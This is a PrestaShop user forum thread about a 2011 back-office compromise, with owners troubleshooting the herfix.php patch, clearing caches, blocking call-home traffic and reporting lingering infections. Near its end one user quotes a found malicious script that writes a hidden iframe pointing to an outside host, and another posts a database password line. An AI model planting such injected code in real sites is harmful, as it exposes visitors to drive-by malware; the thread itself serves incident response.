Please Read: Security Procedure

[Andy1]

My host has kindly fixed this problem foe me, but there might still be a problem.

 

Has PrestaShop changed the layout of the Back Office? When I cleared my cache and went to log in I got a message saying 'Invalid Security Token', but I was logged in. The Back Office looks different.

 

EDIT: It looked different because i was logged into a different account in the BO. Panic over!

 

A huge thanks to my hosting company who have helped sort this out for me.

[berta recchia]

On our site, I had commented out all of the feeds from Prestashop, as they are far too "In your face".

Perhaps an idea would be to allow admins to turn this feature off if they do not want it?

 

I second that.

 

Could this tragedy have been prevented if there was "no link to the mothership"? I tried to hide the ad BO pop-up but it comes back. We know we need ad-ons and we know where to go when we are ready for them.

 

This is extremely painful if you are not an expert and have to rely on a very busy site admin that charge top $$. I've gone two days without sales. Some customers have called, some have apparently just gone to the competitor!

 

A Suggestion, if I may, plase take your time with new releases, test, test ,test before pushing a new version

 

I know it's all about profit and we reaally DO appreciate you work but PLEASE, take your time.

[shacker]

1.4.4.1 have the option to disable the feeds in BO?

[psychogav]

Please help. I have loaded up the fix, changed all the passwords, however whenever I log onto my site www.pumpsforafrica.co.za from whichever pc Avast finds a Trojan which seems to point to a website clickmems.fileave.com. Please will someone help me clear this mess, it is costing me money.

 

I forgot to add, I am not a computer ace.

[Andy1]

When I open the setting.inc.php the line that has

 

define('_DB_PASSWD_', '*********');

 

isn't even showing my old password. Do I need to change this?

[Mike Kranzler]

Hi psychogav,

What exactly is the error you're receiving? Can you provide a screenshot? Additionally, please be sure to clear your browser's cache.

 

-Mike

[Mike Kranzler]

Hi Andy,

If that line isn't showing your old password, what is it showing exactly?

 

-Mike

[ScubaLessonsInc]

I got it to work.. thanks.

[Mike Kranzler]

Hi ScubaLessons,

Please check to see if you transferred the correct herfix.php file. If you've downloaded it more than once for one reason or another, the file may be named herfix (2).php or something similar that will prevent you from applying the fix until you rename it as herfix.php

 

I hope this helps.

 

-Mike

[Andy1]

Hi Andy,

If that line isn't showing your old password, what is it showing exactly?

 

-Mike

 

 

Hi Mike,

 

It shows:

 

define('_DB_PASSWD_', '1gPSs162dp');

 

That's not my password.

 

 

EDIT: I have managed to go into my Cpanel and change the database password by using the password above. However, that password above wasn't set by me.

[psychogav]

Hi Mike, I read earlier that I should load up the original Smarty and Smarty V_2 files. Is this correct?

[ScubaLessonsInc]

Mike,

It was more of a blonde moment LOL.. I actually did not realize it wanted MY site name in there.. I went to http://www.myshop.com/herfix.php and actually wondered why I got an error. Don't I feel dumb. Yes, now you can laugh.. the nerves and fear of being hacked on all my sites and clients sites not only freaked me out but got the best of my brain..

Up since 3 am checking all my sites. As it turns out all my sites are ok. Just found the one file on toolsupplycenter.com but clean it and followed the instructions, no damage done, everything works. We don't store credit cards or use paypal so i am not to worried about any data they got.. but what about customer data.. did the code request any of that?

I read the above and did not see any mention of the customer's data being hacked, but are we absolutely sure that no customer data requests were any part of this code? In other words...Do I need to warn our customers?

I did get it to work on all with the exception of the 3 sites have have where the stores are versions: 1.3.6 and version 1.5 any reason why it would not work on those?

 

Many tanks guys,

T

[Andy1]

Mike,

It was more of a blonde moment LOL.. I actually did not realize it wanted MY site name in there..

 

I don't think you're the only one that made that mistake!

[psychogav]

Which cache should I clear?? I have cleared the cache in Smarty and Smarty2. where else? Sorry, I also have blonde tendancies.

[ScubaLessonsInc]

I would like to know is there a way to turn off the prestashop news in the back office and to sever any external connections. If I want to know the news, I get emails from prestashop. That is sufficient. I do not need the open wound in my stores.

 

Please advise any of you experts (Berta) that seem to know all the tricks. I can not afford to have these sites go down or have any issues. I would love to know just how to get that out permanantly.

 

I would like to second that motion on slowing down the new versions. This is unnecessary.. I don't know of any changes in the newset 1.5 or earlier versions that I could not live without for a few more months. I know the updates are important but perhaps they can be done in "service packs" rather than scary upgrades. Upgrades still feel like new installs and can mess everything up on you. I still have a store I am afraid to upgrade sitting on 1.3.6. because it is getting sales daily I am too cheat to shut it down to tinker with it and take the risk. I am thinking about just doing the store on another site and changing my store link when I get that one working. I was even told when I asked for help they are not supporting the 1.3.6 anymore as it is too dated? HELLO that was FEBRUARY. You would think a developer could stand behind thier software for at least a year. Still steaming mad about that one.

 

In the interim, I would like to weed out any places where the software is not secure.. Calling all coders, where are the scary spots in this software.. put the cards on the table and lets get cracking to close them up! Your help is welcome.

 

Tanks,

Tina

[ScubaLessonsInc]

Thanks Andy.. LOL

Now that I look back on it it sure feels silly..

 

I still am very very concerned. there was also talk about a RJ..somthing. trojan that had nothing to do with this her.php hack, that many people were talking about that actually did serious damage to stores on the other thread. Is there a fix for that? Does this take care of it?

 

I just guess I trusted too much in this software. I love that it is so user friendly and flexible and scalable but this just freaks me out big time. Personally I think it is too soon to do any pats on the back yet.

[schueco]

Thanks for your very quick fix, good job Prestashop!

[psychogav]

Still getting the DAMN VIRUS WARNING.

[Mike Kranzler]

psychogav,

Even if your site is completely fixed, it can take a little bit of time for your hosting provider and other external sources to confirm that its all back up and running. Once the page has been flagged, it takes several crawls confirming that the issue is gone before it removes that warning. I would give it a day or so to finish that, and if you're still having issues after that point please let us know.

 

-Mike

[psychogav]

Thank you Mike,

 

I'll wait.

[Eolia]

I would like to know is there a way to turn off the prestashop news in the back office and to sever any external connections. If I want to know the news, I get emails from prestashop. That is sufficient. I do not need the open wound in my stores.

 

Please advise any of you experts (Berta) that seem to know all the tricks. I can not afford to have these sites go down or have any issues. I would love to know just how to get that out permanantly.

 

I would like to second that motion on slowing down the new versions. This is unnecessary.. I don't know of any changes in the newset 1.5 or earlier versions that I could not live without for a few more months. I know the updates are important but perhaps they can be done in "service packs" rather than scary upgrades. Upgrades still feel like new installs and can mess everything up on you. I still have a store I am afraid to upgrade sitting on 1.3.6. because it is getting sales daily I am too cheat to shut it down to tinker with it and take the risk. I am thinking about just doing the store on another site and changing my store link when I get that one working. I was even told when I asked for help they are not supporting the 1.3.6 anymore as it is too dated? HELLO that was FEBRUARY. You would think a developer could stand behind thier software for at least a year. Still steaming mad about that one.

 

In the interim, I would like to weed out any places where the software is not secure.. Calling all coders, where are the scary spots in this software.. put the cards on the table and lets get cracking to close them up! Your help is welcome.

 

Tanks,

Tina

 

suppress in the ajax.php, in admin directory, all references to www.prestashop.com (11 items) to a false address and modify functions.php line 212 by

function checkPSVersion()
{

return false;}

and disable the "theme and mods catalog" tab.

[Andy1]

Thanks Andy.. LOL

Now that I look back on it it sure feels silly..

 

 

If it helps, during my panic earlier today, I was looking at the filezilla screen and I went white. There was nothing, no folder, files, etc. I thought 'It's all gone, I have really been screwed over by this'. I went to get a coffee and calm down before returning to the computer and work out what to do next. Upon my return I realised I hadn't clicked the 'connect' button, that's why the screen was blank.

 

I can't use the blonde excuse, as I have brown hair, and not much of it either!

 

I would echo the idea of slowing down with the release of a new version. I can only talk about the perspective from a complete novice. A month ago I though CSS was a shop that sold furniture (oh no, that's CSL). When I saw a new version was out, I immediately thought it was essential to download it. Now, for those that know what they are doing, this is easy. For me, this was a massive challenge. If it works then all is well, but if things go wrong, as a novice it can make you think Prestashop is complicated, you need to constantly update it and it can go wrong easily. This isn't true and it would be a shame to lose store users that are new to e-commerce because of this. Slowing down the release will allow new users to get familiar with the current version and understand files such as css, tpl etc.

 

On the other hand, there are those that know what they are doing and have multiple stores. If things go wrong, they have even more to deal with as they have more stores.

 

The above isn't a moan. I just agree with what's being said, but wanted to add my reason too.

 

But, thanks for letting us all know about the issue and being so efficient at resolving it.

[randori]

The fix is not working for me. and I dont have that cache file in smarty map.

 

My is site from the update of June. If i download the newest update and do it. Will this fix the virus?

[Mike Kranzler]

Hi Tina,

The reason that fix didn't work on your other stores is because the issue exists ONLY in 1.4. We didn't create a fix for any of the other versions of PrestaShop because they weren't affected. You can continue to run those stores as you had been previously.

 

-Mike

[merlin-1]

 

I get emails from prestashop. That is sufficient. I do not need the open wound in my stores.

 

I think this is paramount! It never dawned on me before this, but the idea of your site messing with mine is not at all acceptable. I want the option to break any and all communication between the two. And its reasonable to expect that

[rassy]

 

suppress in the ajax.php, in admin directory, all references to www.prestashop.com (11 items) to a false address and modify functions.php line 212 by

function checkPSVersion()
{

return false;}

and disable the "theme and mods catalog" tab.

 

Hi guys, my localhost developing system running on MAMP osx also was hacked.

 

Now this is really strange. HOW could the hacker get my IP Adress? I mean: Sure the MAMP system has not been secured, but I only had the Apache server running for a few ours... so my guess is that there must be a central place where all hosted prestashop-ip's are collected. I mean: portscan take ages and my localhost was infected within seconds. So there must be something wrong.

 

Are you guys sure that the above "call-home" functions are the only places I need to disable in order to prevent my presta-instance from calling home?

[Imtec Admin]

 

suppress in the ajax.php, in admin directory, all references to www.prestashop.com (11 items) to a false address and modify functions.php line 212 by

function checkPSVersion()
{

return false;}

and disable the "theme and mods catalog" tab.

 

Hi guys, my localhost developing system running on MAMP osx also was hacked.

 

Now this is really strange. HOW could the hacker get my IP Adress? I mean: Sure the MAMP system has not been secured, but I only had the Apache server running for a few ours... so my guess is that there must be a central place where all hosted prestashop-ip's are collected. I mean: portscan take ages and my localhost was infected within seconds. So there must be something wrong.

 

Are you guys sure that the above "call-home" functions are the only places I need to disable in order to prevent my presta-instance from calling home?

 

I agree width Rassy. My VHost admin can be accessed only from dedicated IPs and my shop was hacked after 10 day( so long has been active). I'm afraid that his solution is too open, even for open source...

[doubleD]

 

suppress in the ajax.php, in admin directory, all references to www.prestashop.com (11 items) to a false address and modify functions.php line 212 by

function checkPSVersion()
{

return false;}

and disable the "theme and mods catalog" tab.

 

Hi guys, my localhost developing system running on MAMP osx also was hacked.

 

Now this is really strange. HOW could the hacker get my IP Adress? I mean: Sure the MAMP system has not been secured, but I only had the Apache server running for a few ours... so my guess is that there must be a central place where all hosted prestashop-ip's are collected. I mean: portscan take ages and my localhost was infected within seconds. So there must be something wrong.

 

Are you guys sure that the above "call-home" functions are the only places I need to disable in order to prevent my presta-instance from calling home?

 

 

I think it was mentioned before. Your local shop was affected when you logged in to presta's backoffice on local machine.

[Tim Dwyer]

I applied the fix at 8.30am this morning but still getting warnings of jokelimo.com being on the front page - I can't see where this ref is although there is a large chunk of JS at the bottom of the page.

 

Please can you assist?

[shacker]

you need to replace your footer.tpl for the orifinal and enalble the force compile in preferences, performance

[doubleD]

Thanks a lot to Prestashop team and Community for the fix !

[Tim Dwyer]

Hi

 

I replaced the footer.tpl (although the files were identical) and there is no difference - still has jokelimo

 

Thought it might be {$HOOK_FOOTER} in footer.tpl - but even with that removed it still warns of jokelimo

 

Any further help??

 

Thanks

[doubleD]

Hi

 

I replaced the footer.tpl (although the files were identical) and there is no difference - still has jokelimo

 

Could it be the {$HOOK_FOOTER} - whatever that may be??

 

Thanks

Did you enable the force compile in preferences, performance as "shacker" wrote?

[Tim Dwyer]

Hi

 

I replaced the footer.tpl (although the files were identical) and there is no difference - still has jokelimo

 

Could it be the {$HOOK_FOOTER} - whatever that may be??

 

Thanks

Did you enable the force compile in preferences, performance as "shacker" wrote?

 

Thanks a lot - too much haste on my part - I enabled the force compile in preferences, performance and all now appears OK

 

Thankyou for taking the time to check this with me.

[doubleD]

Hi

 

I replaced the footer.tpl (although the files were identical) and there is no difference - still has jokelimo

 

Could it be the {$HOOK_FOOTER} - whatever that may be??

 

Thanks

Did you enable the force compile in preferences, performance as "shacker" wrote?

 

Thanks a lot - too much haste on my part - I enabled the force compile in preferences, performance and all now appears OK

 

Thankyou for taking the time to check this with me.

 

You're welcome. I suggest you to delete all files from "themes/your theme directory/cache/ (except index.php) and tools/smarty/compile/ (except index.php also)". Then you are free to enable presta cache.

[shacker]

for clear cache , you can search in the forum our free module Clear Smarty. works in smarty v2 and 3

[keweli]

If your site is of any importance to you, you should really be backing up databases as well as all server files.

 

Funny enough the site that got infected for me was just a catalogue with no customers etc.. The real site with transactions was unharmed but I still applied the fix.

 

I would think that after this problem the Prestashop server will be more secure. For the time being we should trust them to identify/fix any more holes and refrain from modifying/deleting code ourselves if it is of no immediate harm. Give them some time.

[lynnetted]

Hi

 

I replaced the footer.tpl (although the files were identical) and there is no difference - still has jokelimo

 

Could it be the {$HOOK_FOOTER} - whatever that may be??

 

Thanks

Did you enable the force compile in preferences, performance as "shacker" wrote?

 

Thanks a lot - too much haste on my part - I enabled the force compile in preferences, performance and all now appears OK

 

Thankyou for taking the time to check this with me.

 

You're welcome. I suggest you to delete all files from "themes/your theme directory/cache/ (except index.php) and tools/smarty/compile/ (except index.php also)". Then you are free to enable presta cache.

 

Question: Why do you leave the index.php files?

[doubleD]

Question: Why do you leave the index.php files?

 

To prevent direct access to cache folders (http://yoursite/tools/smarty/compile/) etc...

[Tim Dwyer]

Hi

 

I replaced the footer.tpl (although the files were identical) and there is no difference - still has jokelimo

 

Could it be the {$HOOK_FOOTER} - whatever that may be??

 

Thanks

Did you enable the force compile in preferences, performance as "shacker" wrote?

 

Thanks a lot - too much haste on my part - I enabled the force compile in preferences, performance and all now appears OK

 

Thankyou for taking the time to check this with me.

 

You're welcome. I suggest you to delete all files from "themes/your theme directory/cache/ (except index.php) and tools/smarty/compile/ (except index.php also)". Then you are free to enable presta cache.

 

That is successfully complete - I am pleased to report that there were no rogue files there.

 

Thanks again

[sparks777]

I apply this fix on local installation (yes, I also have this 'her'file on my local test mashine!)

(Thanks for patch!!!)

 

I compare my folders and files (PS v.1.4.4.0) with fresh downloaded PS v 1.4.4.1

Have two question after applying fix:

 

1) in \download\ directory after applying `herfix` I see a new file (.htaccess) - for what?

 

2) now changed file ajax.php have difference in line 634 with original file in PS.v.1.4.4.1 (this changes was made by `herfix` because I owerwrite before applying fix this string from PS.v.1.4.4.1)

(!) What string are OK??

please see pic (left/1st_below was made by herfix; right/second_below is original from PS.1.4.4.1)

 

 

I think that this strings are same but when you need compare files (what changed) this difference waste a time

[lynnetted]

A couple of questions:

 

1) starting about two weeks ago, I could not log into our Back Office and see the categories and settings and all the things I expected to see. It was like I had logged into someone else's back office. Making changes in this back office did not affect our website.

 

2) This didn't occur on every computer or in every browser.

 

3) I ran the patch, but was unable to change any passowrds in the database or the name of the admin folder or user passwords because I am new here and don't have all these permissions/training.

 

4) NOW when I log into our Back Office using computers and browsers where I was able to login before, I don't see our back office, I see the strange one.

 

Has anyone else had this experience where they suddenly seemed to be logging into some strange back office, not their own? Does it have any relationship with the security issues? What are the implications of not changing all the passwords and folder names right away?

 

Thanks!

Lynnette

 

ps - before I ran the security patch, our website had lost a lot of functionality. It's come back now! I'm so happy about that. If I could just log into the back office - all would be complete! Thanks!

[lynnetted]

One Other Question:

 

If we disconnect our Back Office from PrestaShop - will we be able to use the 'Automatic Upgrades' in 1.4.4?

 

Thanks again!

Lynnette

[lynnetted]

Sorry for being bothersome but I thought of another question:

 

There is more than one security flaw listed here - Does this mean PrestaShop is not PCI compliant? Or a shop using PrestaShop cannot become PCI compliant?

Thanks!

[Asenar]

Hi sparks777,

 

1) in \download\ directory after applying `herfix` I see a new file (.htaccess) - for what?

>>> Additionnal security

 

2) now changed file ajax.php have difference in line 634 with original file in PS.v.1.4.4.1 (this changes was made by `herfix` because I owerwrite before applying fix this string from PS.v.1.4.4.1)

(!) What string are OK??

please see pic (left/1st_below was made by herfix; right/second_below is original from PS.1.4.4.1)

>>> Both are equal.

 

=========================

lynnetted,

 

1) starting about two weeks ago, I could not log into our Back Office and see the categories and settings and all the things I expected to see. It was like I had logged into someone else's back office. Making changes in this back office did not affect our website.

 

2) This didn't occur on every computer or in every browser.

>> It seems that is not related to that attack. Maybe a configuration problem related to some cache preferences.

 

3) I ran the patch, but was unable to change any passowrds in the database or the name of the admin folder or user passwords because I am new here and don't have all these permissions/training.

>>> ask to your webmaster or sysadmin/host provider

 

4) NOW when I log into our Back Office using computers and browsers where I was able to login before, I don't see our back office, I see the strange one.

>>> can you please send me that by private message, with an access to your back-office ?

[designguy79]

Hi guys, my localhost developing system running on MAMP osx also was hacked.

 

Now this is really strange. HOW could the hacker get my IP Adress?

 

He didn't NEED your IP address -- when you logged in to PrestaShop admin panel, your computer downloaded the infected code from PrestaShop.com

[designguy79]

This is a very BIG problem.

 

A lot of people use ps distribution for work, and compromise a lot of store only for send text message from PS website is very ******.

 

I'm sorry but i close the prestashop.com website access to all my store - website on my server, next installation of PS i'll check if all work good whitout the connection to prestashop website.

 

I've use iptables to block all in-out connection to and for prestashop.com

 

under unix using iptables:

 

iptables -A INPUT -s 213.186.52.66 -j DROP

iptables -A OUTPUT -d 213.186.52.66 -j DROP

 

I agree that this is a very serious problem. I definitely think there should be a configuration option to "turn off" any "calls home."

 

The problem with blocking by IP address is that it you would have to know all of the IP addresses *.prestashop.com uses, and if they change or add any, you are (potentially) vulnerable again.

[jebba]

How to make sure it doesn't happen again

Run the herphp.php fix, it patches the AdminHome.php file which had the bug that allows the Prestashop.com site to send files to your server.

 

I'll note that the AdminHome.php page isn't modified by herfix.php. Nor in the prestashop 1.4.4.1 update is the AdminHome.php file changed. The admin/ajax.php file *is* modified.

 

I'm not certain if there is an oversight in the fix, or whether it is just supposed to change ajax.php.

 

I should also note that herfix.php reported "OK" when I ran it, but it did *not* update the ajax.php file since it didn't have permissions to do so. A fixed ajax.php should have this sha1sum, afaict: 6ca91f205645bdad957a93ee9bc88c47739ad891

 

Thanks,

 

-Jeff

[marcel_nz]

Patch was not working for me, it did not update ajax.php.

 

I added some debugging output to her.php to see what was going wrong (I'm a PHP developer

and I found there was a version mismatch.

 

echo "version: "._PS_VERSION_."\n";

 

gives me "1.4.3"

 

so this line will always fail:

if (_PS_VERSION_ == '1.4.3.0')

 

so I amended it to:

if (_PS_VERSION_ == '1.4.3.0' || _PS_VERSION_ == '1.4.3')

and that did the trick.

 

Quite possible that I am not the only one with this problem.

[dissatisfied]

I posted this in my related thread just a second ago before I notice the security notice had its own thread going here. So here it goes again:

 

It is worth noting that this code in admin/ajax.php that I pointed out [was transmitting your email and other shop information to Prestashop.com] was the code responsible for the recent security issues. As I noted before, in addition to sending your email address, shop name, and url to Prestashop.com, this code loads data to be displayed in your back office dashboard. This data was not properly validated, allowing the hackers to inject their own code into each of our servers once they took over the script at Prestashop.com.

 

Based on this, it is important to note that even for shops that did not have malicious files downloaded to them, the hackers may have the shop email address, along with some other shop information (language, shop name, etc.). Depending on how long the hackers were in control of Prestashop.com's script, they may have a database of thousands or tens of thousands of emails and other data for known-active shops.

 

The reason this matters (and it seems I need to explain this because nobody as yet has cared that the shop software sends out shop information willy-nilly) is a database like that is perfect for sending targeted, legitimate-looking emails for phishing purposes. The official Prestashop security notice gives no warning of this (or even that the hackers may have your email address even if you weren't visibly hacked. Why? Perhaps it would make it too explicit that their own script has been gathering your data).

 

Every Prestashop user should be wary of any email coming to their shop address purporting to come from Prestashop.com, their own Prestashop install, or any other source wherein the message references their shop. Follow the usual safety guidelines: never respond to an email requesting any passwords, usernames, or related data; never click a link in an email and "log in" at the resulting page (enter your shop admin url or Prestashop.com into your browser manually instead); and especially be aware of any potentially false "security alerts" instructing you to enter information into any websites or upload files to or otherwise alter your shop install - always double-check those are legitimate by visiting Prestashop.com.

 

These are rules you should be following on a daily basis anyway, but many don't and it may be especially important now.

 

I hope the Prestashop admins will see fit to include some kind of warning about potential phishing attacks in their security notice.

[BWT]

After applying the fix and changing all passwords I still see the warning in the back office does this mean i didn't do it right? also when i went to my domain/herfix in the browser it showed a 404 error is this also normal? or should it have done something else? please let me know asap so it it wasn't done right I can try again lastly the herfix.php file does that stay in the root folder now?

Thank you

[Eolia]

After applying the fix and changing all passwords I still see the warning in the back office does this mean i didn't do it right? also when i went to my domain/herfix in the browser it showed a 404 error is this also normal? or should it have done something else? please let me know asap so it it wasn't done right I can try again lastly the herfix.php file does that stay in the root folder now?

Thank you

 

404 error ->Normal:the file herfix.php is destroyed once executed, it has the rights for it.

Have you disabled the cache of your store, emptied the directory smarty / compile (except index.php),emptied the cache smarty / cache, emptied the cache themes / yourtheme / cache, empty the cache of yourbrowser, and reactivated your cache, once the patch installed?

[Big_Berny]

I always get this error when running herfix.php:

Warning: file_exists() [function.file-exists]: open_basedir restriction in effect. File(/var/www/vhosts/sweetbasel.com/httpdocs/../tabs) is not within the allowed path(s): (/var/www/vhosts/sweetbasel.com/httpdocs:/tmp) in /var/www/vhosts/sweetbasel.com/httpdocs/herfix.php on line 3156
OK

 

Any idea why this is happening?

[Bewitching]

My concern about this whole mess is that I was NEVER notified about this vulnerability ! I have received no email notice whatsoever. If I hadn't come here today looking for info on another matter, I would never have known! I receive all other emails from Prestashop, including "PrestaShop now has over 10,000 fans on Facebook. "

I did have the her.php file, but none of the others. I applied the fixes mention in the Blog

I just don't understand. Was ANYONE notified, or did they just find out by stumbling over here or at the blog ?

 

I guess I feel like I just got kicked in the %*%#@#$ !!!!

My heart sank as soon as I read the word hacked/security.

 

Well, hopefully this is the end of this matter.

[akboselk]

hi

 

I upgraded to PS 1.4.4.1 (from PS 1.4.4.0), so Should I still need to run herfix file on my system

 

Thanks

[Eolia]

hi

 

I upgraded to PS 1.4.4.1 (from PS 1.4.4.0), so Should I still need to run herfix file on my system

 

Thanks

If you downloaded the latest version, the file ajax.php has been modified . There is no need to apply the patch.

[indus]

My concern about this whole mess is that I was NEVER notified about this vulnerability ! I have received no email notice whatsoever. If I hadn't come here today looking for info on another matter, I would never have known! I receive all other emails from Prestashop, including "PrestaShop now has over 10,000 fans on Facebook. "

I did have the her.php file, but none of the others. I applied the fixes mention in the Blog

I just don't understand. Was ANYONE notified, or did they just find out by stumbling over here or at the blog ?

 

I guess I feel like I just got kicked in the %*%#@#$ !!!!

My heart sank as soon as I read the word hacked/security.

 

Well, hopefully this is the end of this matter.

 

Hope you changed all your passwords.

[berta recchia]

My concern about this whole mess is that I was NEVER notified about this vulnerability !

I just don't understand. Was ANYONE notified, or did they just find out by stumbling over here or at the blog ?

 

 

Nope, you're not alone.

I HAD FIRST heard it from a customer complaining about his virus program screaming at him! I didn't look that professional with him of course. Then I looked at my site on firefox and chrome and didn't see any problmes. Then finally used IE which showed some parts of the web site in trouble. Then my admin found the hack at the bottom of my pages.

I typed part of the hack on google and found a presta thread.....I'm now paying top $$ to have someone make repairs, fixes.

[shacker]

My concern about this whole mess is that I was NEVER notified about this vulnerability ! I have received no email notice whatsoever. If I hadn't come here today looking for info on another matter, I would never have known! I receive all other emails from Prestashop, including "PrestaShop now has over 10,000 fans on Facebook. "

I did have the her.php file, but none of the others. I applied the fixes mention in the Blog

I just don't understand. Was ANYONE notified, or did they just find out by stumbling over here or at the blog ?

 

I guess I feel like I just got kicked in the %*%#@#$ !!!!

My heart sank as soon as I read the word hacked/security.

 

Well, hopefully this is the end of this matter.

In the BO is an advice of this issue, and in the page of presta. A newsletter to customer suscribed ot newsletter is now the solution. But putting the announce in the BO is the better option.

[designguy79]

But putting the announce in the BO is the better option.

 

Very ironic, in my opinion, since it was a flaw in that very feature of BO that this hack exploited!!

 

Concerned people (such as myself), have turned off communication between our local PrestaShop installs and the "mother ship" (PrestaShop.com). I would recommend others to the same. I am not going to take a chance that there is additional code that is still vulnerable, and that the hacker(s) have not left back doors on PrestaShop.com's systems.

[shacker]

yes, but dont have a chance to send all emails to all customers (i think that prestashop dont have the email of all store owners), so the best option is this. Second, All systems can be hacked, and breacked. If you dont have access to the news in your BO, but the hackers get access to prestashop.com, replaces a stable version in download section, and a lot of customers download a hacked verision of presta, is a similar thing. The best that we can do is support this system, and dont wait that all comes from the skyes without give nothing. The problem has solved quick, and this is that we want. Solve quick, and responses from the developers. My prestashop is not hacked, becouse i apply security fixes, and make backups regulary. For all store owners that your store is important, do the same.

[merlin-1]

You guys are blowing this off as "no big deal" way too easy. Its a huge deal! Hackers were able to dump files and change code on every site using prestashop! Simply because you feel we need to have news blasted at us on our back ends. More important then security? On a commerce site??

 

Someone was able to alter my commerce site<<< That sentence right there is a very big deal!

 

You got on it fast, and that's great, thank you very much for prompt fix. But that hole should not have been there. This is not a hobby to most of us. This is business. And as its been said here by many: We don't need news in our back end. And we should have the option to cut all ties to ANY site that we do not control. To argue that's an unreasonable request is absurd

 

I received notice of this breach via email. That is great and enough. And if prestashop isn't going to help cut ties to websites we can not control to avoid this kind of issue, I can see myself, and 100s of thousands of other users changing software. This is a huge deal, and it needs to be treated as such

 

Again, you folks were fantastic in response to it. But the ability to alter my site from another is not acceptable. That needs an option to break it.

[kosmolog]

What information could be intercepted by hackers after prestashop infection?

anyone know?

[berta recchia]

Solve quick, and responses from the developers. My prestashop is not hacked, becouse i apply security fixes, and make backups regulary. For all store owners that your store is important, do the same.

 

Wrong. Wrong.

Is this the official PS statement about this problem?

You quick fix was not quick enough. For all I know the hackers could have downloaded all the emails of my customers. What if they are being scammed using my shop name?

We do regualr backups and whatever security fix is suggested to us. That didn't prevent my site from being hacked from something WE didn't do.

[shacker]

check your IP access in your host to see if the hackers access to your admin with the bug.

[shacker]

ANd i dont think that hackers can access to 30 000 prestashop stores and downloaded all in only one day.

[kosmolog]

check your IP access in your host to see if the hackers access to your admin with the bug.

 

please, for more information on how to do it?

[keweli]

Have any details about the attackers been found?

[indus]

Iam also interested in knowing this.Is presta team comtemplating any legal action on the attackers.Have they been identified?

[jebba]

How to make sure it doesn't happen again

Run the herphp.php fix, it patches the AdminHome.php file which had the bug that allows the Prestashop.com site to send files to your server.

 

I'll note that the AdminHome.php page isn't modified by herfix.php. Nor in the prestashop 1.4.4.1 update is the AdminHome.php file changed. The admin/ajax.php file *is* modified.

 

Prestashop devs followed up with me about this in email, writing:

 

The AdminHome.php is updated only if you were in 1.4.0.17

Between 1.4.4.0 and 1.4.4.1, only ajax.php needed to be updated.

 

-Jeff

[crunch]

Many thanks to the prestashop team for their efforts.

That was the easiest and fastest fix for a compromised site I have ever done!

[tatayoyo]

Hi eveyrone!

 

I've got this problem and try to fix it.

I did all the process but the error message is the same, "hack attempt".

When I test "herfix.php" on my local, that's work and write OK.

 

What should I do to fix it?

 

Thanks for your time!

 

S.

[jimmy15green]

upto what extent these hackers are harmful ???

[bedum]

Hi i am using V1.4.4.0 and i have followed all the 7 steps from this page.

http://www.prestasho...rity_procedure/

 

All succesful and OK. But my footer still show the hacked message below.

 

"Module powered by Prestashop Modules - iLet"

 

I have checked my footer.tpl but there is no such word inside.. please help

[Carl Favre]

Hi bedum,

 

Do you have some "strange" code in your footer.tpl ?

[mtanislav]

hello, is it only with my shop or others have this problem too.

After I applied the patch I started getting fake carts generated by crawlers. I get like 1000 carts generated every day.

Does anybody else have this problem?

I have prestashop v1.4.1

[shacker]

check the code in the footer.tpl, and you ca ndelete these test orders wit hmy module delete connections (free)

[hurray]

Hi,

I have two store that use prestashop version 1.3.5.0 and 1.3.1.1. This week in a matter of 3 days, I received two emails from Google team, one for each store about a possible phishing attack from my stores. I contacted my host and they believe it could be the security issue with prestashop. Apparently other prestashop owners have also been receiving the same email.

Could this be due to the hack on prestashop website? You said it did not affect older versions but I wonder. Can anyone please post me a fix?

Here's the email from google. They point the problem with paypal/redirect.php file.

 

Dear site owner or webmaster of savdana.com,

We recently discovered that some pages on your site look like a possible phishing attack, in which users are encouraged to give up sensitive information such as login credentials or banking information. We have removed the suspicious URLs from Google.com search results and have begun showing a warning page to users who visit these URLs in certain browsers that receive anti-phishing data from Google.

Below are one or more example URLs on your site which may be part of a phishing attack:

http://www.savdana .com/modules/paypal/redirect.php

Here is a link to a sample warning page:

http://www.google.com/interstitial?url=http%3A//www.savdana.com/modules/paypal/redirect.php

We strongly encourage you to investigate this immediately to protect users who are being directed to a suspected phishing attack being hosted on your web site. Although some sites intentionally host such attacks, in many cases the webmaster is unaware because:

1) the site was compromised

2) the site doesn't monitor for malicious user-contributed content

If your site was compromised, it's important to not only remove the content involved in the phishing attack, but to also identify and fix the vulnerability that enabled such content to be placed on your site. We suggest contacting your hosting provider if you are unsure of how to proceed.

Once you've secured your site, and removed the content involved in the suspected phishing attack, or if you believe we have made an error and this is not actually a phishing attack, you can request that the warning be removed by visiting

http://www.google.com/safebrowsing/report_error/?tpl=emailer

and reporting an "incorrect forgery alert." We will review this request and take the appropriate actions.

Sincerely,

Google Search Quality Team

[scfinder]

thank you for this topic it helps me a lot

[Setu]

hi all

after i have apply the fix my site is broken .

how can i fix it ?

that i get when i start my site:

 

include(dirname(__FILE__).'/config/config.inc.php'); if(intval(Configuration::get('PS_REWRITING_SETTINGS')) === 1) $rewrited_url = __PS_BASE_URI__; include(dirname(__FILE__).'/header.php'); $smarty->assign('HOOK_HOME', Module::hookExec('home')); $smarty->display(_PS_THEME_DIR_.'index.tpl'); include(dirname(__FILE__).'/footer.php'); ?>

 

can u help me?

[akiralast]

i am using prestashop v1.4.7.3 got hack by sudan security team, can anybody help me ?

[reinoplantae]

Well... in the herfix.php i don't see any mention to the version 1.4.6.2 (the one i'm using). So... won't this fix take effect in PS 1.4.6.2?? I've noticied that my ajax.php has not been modified.

[jajajaja@]

Hello we are lost in Spain can not find solution I found this code in versions of PrestaShop: 1.4.8.2-1.4.6 and 1.4.7

[Mike Kranzler]

This fix does not apply to versions of PrestaShop after v1.4.4.0, as it was fixed in all releases from 1.4.4.1 and on. elitemfitness, what specific code did you find on your sites? And were these versions previously upgraded from earlier releases, or downloaded and installed in their current forms?

 

-Mike

[jajajaja@]

This fix does not apply to versions of PrestaShop after v1.4.4.0, as it was fixed in all releases from 1.4.4.1 and on. elitemfitness, what specific code did you find on your sites? And were these versions previously upgraded from earlier releases, or downloaded and installed in their current forms?

 

-Mike

 

new installed

this is the wrong code

 

<!--c3284d--> <script type="text/javascript">

document.write('<iframe src="http://torvaldscallthat.info/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');

</script><!--/c3284d-->

Edited July 18, 2012 by elitemfitness (see edit history)

[nadie]

new installed

this is the wrong code

 

 

 

I think it is not prestashop problem is the problem of security of your hosting.

 

Sorry for my English

[jajajaja@]

